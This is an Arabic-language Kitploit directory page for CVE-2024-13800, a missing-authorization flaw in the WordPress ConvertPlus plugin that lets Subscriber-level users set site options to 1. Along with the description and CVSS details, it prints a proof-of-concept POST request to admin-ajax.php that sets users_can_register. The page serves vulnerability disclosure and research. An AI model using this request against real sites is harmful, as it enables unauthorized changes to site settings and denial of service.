Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-13800 — إضافة النوافذ المنبثقة لووردبريس - ConvertPlus <= 3.5.30 - نقص التفويض لتحديث خيارات محدودة من طرف مستخدم مصادق عليه (مشترك+) | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-13800
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقسوء التكوين
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

إضافة النوافذ المنبثقة لووردبريس - ConvertPlus <= 3.5.30 - نقص التفويض لتحديث خيارات محدودة من طرف مستخدم مصادق عليه (مشترك+)

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-13800

إضافة Popup Plugin لـ WordPress - ConvertPlus <= 3.5.30 - غياب التحقق من الصلاحية لتحديث محدود للخيارات للمستخدمين المصادق عليهم (بصلاحية مشترك+)

الوصف

إضافة ConvertPlus لـ WordPress معرّضة لتعديل غير مصرّح به للبيانات يمكن أن يؤدي إلى حرمان من الخدمة بسبب عدم وجود فحص صلاحية على نقطة نهاية AJAX 'cp_dismiss_notice' في جميع الإصدارات حتى 3.5.30 وما يتضمنه. وهذا يتيح للمهاجمين المصادق عليهم، ممن يملكون صلاحية مستوى مشترك (Subscriber) أو أعلى، إمكانية تحديث قيم الخيارات إلى '1' على موقع WordPress. ويمكن استغلال ذلك لتحديث خيار من شأنه إنشاء خطأ في الموقع وحرمان المستخدمين الشرعيين من الخدمة، أو استخدامه لتعيين بعض القيم إلى true مثل التسجيل.

التفاصيل

  • النوع: plugin
  • المعرف (Slug): convertplug
  • الإصدار المتأثر: 3.5.30
  • درجة CVSS: 8.1
  • تقييم CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-13800
  • الحالة: خاص

ملاحظات

تضع هذه الثغرة القيمة 1 فقط في قاعدة البيانات، لذا يمكنك فقط وضع 1 في users_can_register

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: kubernetes.docker.internal:5555 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 50 Origin: http://kubernetes.docker.internal:5555 Connection: keep-alive Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011 action=cp_dismiss_notice&notice=users_can_register
تنزيل الأداة